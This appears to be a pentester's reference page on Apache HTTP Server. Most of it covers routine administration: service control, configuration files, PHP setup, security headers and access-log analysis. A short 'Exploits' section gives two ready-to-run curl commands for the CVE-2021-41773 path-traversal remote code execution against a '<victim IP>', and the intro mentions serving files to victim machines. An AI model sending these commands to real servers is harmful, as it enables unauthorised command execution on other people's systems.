Apache Web Server

Web server listening on TCP port 80 by default. Useful for:

  • Hosting a website
  • Distributing files that will be downloaded by a victim machine

Exploits

Popular exploits.

CVE-2021-41773 (Apache HTTP Server 2.4.49 only)

curl --data "echo;id" 'http://<victim IP>/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
curl -v 'http://<victim IP>/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh?-c+id'

Start Apache Web Server

sudo service apache2 start

Open a web browser and go to http://127.0.0.1

Stop Apache Web Server

sudo service apache2 stop

Service Status

sudo service apache2 status
sudo netstat -antp | grep apache2
sudo ss -antpl | grep apache2

Configurations

Apache Document Root

cd /etc/apache2
grep -Ri DocumentRoot .
/var/www/html/

Default index page location

/var/www/html/index.html

Configuration files

/etc/apache2/
|-- apache2.conf
|       `--  ports.conf
|-- mods-enabled
|       |-- *.load
|       `-- *.conf
|-- conf-enabled
|       `-- *.conf
|-- sites-enabled
|       `-- *.conf

Remove directory listing

Directory listing is by default in Kali, remove it!

sudo nano /etc/apache2/apache2.conf

Remove Indexes:

<Directory /var/www/>
        Options Indexes FollowSymLinks
        AllowOverride None
        Require all granted
</Directory>
<Directory /var/www/>
        Options FollowSymLinks
        AllowOverride None
        Require all granted
</Directory>
sudo service apache2 restart

Enabling PHP in Kali Linux

Installation

sudo apt update
sudo apt install php libapache2-mod-php

List modules

sudo apache2ctl -M

If PHP module is enabled, it should be listed like this:

php_module (shared)

List PHP configuration files

ls /etc/apache2/mods-available | grep php

Enable PHP module

Use the version previously found from configuration files.


sudo a2enmod php8.2

Restart the Apache service

sudo service apache2 restart

Adding security headers

############## Configuration file for security headers
# Server config: httpd.conf
# Site specific: .htaccess
Open CPanel -> Advanced -> Terminal
nano /home/${USER}/public_html/.htaccess

# Add at the beginning of the file
# Extra Security Headers
<IfModule mod_headers.c>
Header set X-XSS-Protection "1; mode=block"
Header always append X-Frame-Options SAMEORIGIN
Header set X-Content-Type-Options nosniff
Header set X-Powered-By "The power of love"
</IfModule>

# Add at the end of the file
# START - Disable server signature #
ServerSignature Off
# END - Disable server signature #

################# PHP CONFIG
# Remove PHP version from server responses
# In CPanel: Software -> MultiPHP INI Editor
nano /usr/local/lib/php.ini
nano /home/${USER}/public_html/php.ini
expose_php = Off

Log files

Log file for Apache (XAMPP) on Windows is located at C:\xampp\apache\logs\access.log.

Display log file

sudo tail -f /var/log/apache2/access.log

Search in Log

Unique origin IP addresses in log

cut -d " " -f 1 /var/log/apache2/access.log | sort -u

Number of occurrences of each origin IP address, descending.

cut -d " " -f 1 /var/log/apache2/access.log | sort | uniq -c | sort -urn

Number of occurrences of each HTTP request filtered on one IP

grep $IP /var/log/apache2/access.log | cut -d "\"" -f 2 | uniq -c